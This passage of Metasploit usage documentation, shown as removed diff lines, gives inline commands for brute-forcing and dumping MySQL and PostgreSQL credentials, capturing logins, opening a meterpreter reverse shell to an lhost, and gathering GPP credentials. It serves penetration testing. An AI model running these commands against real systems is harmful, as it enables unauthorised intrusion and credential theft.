-run cidr:/24:mysql://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
-```
-
-### MySQL Dumping
-
-User and hash dump:
-
-```
-use auxiliary/scanner/mysql/mysql_hashdump
-run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
-```
-
-Schema dump:
-
-```
-use auxiliary/scanner/mysql/mysql_schemadump
-run 'mysql://root: a b c p4$$w0rd@127.0.0.1'
-```
-
-### MySQL Querying
-
-Execute raw SQL:
-
-```
-use admin/mysql/mysql_sql
-run 'mysql://root: a b c p4$$w0rd@127.0.0.1' sql='select version()'
-```
-
-## PostgreSQL
-
-For instance, when running a PostgreSQL instance:
-
-```
-docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
-```
-
-### PostgreSQL Enumeration
-
-Enumerate version:
-
-```
-use auxiliary/scanner/postgres/postgres_version
-run postgres://192.168.123.13
-run postgres://postgres:password@192.168.123.13
-```
-
-### PostgreSQL Login / Bruteforce
-
-If you have PostgreSQL credentials to validate:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
-```
-
-Re-using PostgreSQL credentials in a subnet:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run cidr:/24:myspostgresl://user:pass@192.168.222.0 threads=50
-```
-
-Using an alternative port:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run postgres://user:pass@192.168.123.6:2222
-```
-
-Brute-force host with known user and password list:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run postgres://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
-```
-
-Brute-force credentials:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
-```
-
-Brute-force credentials in a subnet:
-
-```
-use auxiliary/scanner/postgres/postgres_login
-run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
-run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
-```
-
-### PostgreSQL Capture Server
-
-Captures and log PostgreSQL credentials:
-
-```
-use auxiliary/server/capture/postgresql
-run
-```
-
-For example, if a client connects with:
-
-```
-psql postgres://postgres:mysecretpassword@localhost:5432
-```
-
-Metasploit's output will be:
-
-```
-msf6 auxiliary(server/capture/postgresql) >
-[*] Started service listener on 0.0.0.0:5432
-[*] Server started.
-[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
-```
-
-### PostgreSQL Dumping
-
-User and hash dump:
-
-```
-use auxiliary/scanner/postgres/postgres_hashdump
-run postgres://postgres:password@192.168.123.13
-run postgres://postgres:password@192.168.123.13/database_name
-```
-
-Schema dump:
-
-```
-use auxiliary/scanner/postgres/postgres_schemadump
-run postgres://postgres:password@192.168.123.13
-run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
-```
-
-### PostgreSQL Querying
-
-```
-use auxiliary/admin/postgres/postgres_sql
-run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
-```
-
-### PostgreSQL Reverse Shell
-
-
-```
-use exploit/linux/postgres/postgres_payload
-run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
-```
-
-## Upgrading shells to Meterpreter
-
-To upgrade a specific session to Meterpreter:
-
-```
-sessions -u 3
-```
-
-To upgrade the most recently opened session to Meterpreter using the `sessions` command:
-
-```
-sessions -u -1
-```
-
-Or run the `shell_to_meterpreter` module manually:
-
-```
-use multi/manage/shell_to_meterpreter
-run session=-1
-run session=-1 win_transfer=POWERSHELL
-run session=-1 win_transfer=VBS
-```
-
-## Post Modules
-
-Providing inline options also works for post modules:
-
-```
-use auxiliary/windows/gather/credentials/gpp
-run session=-1
-```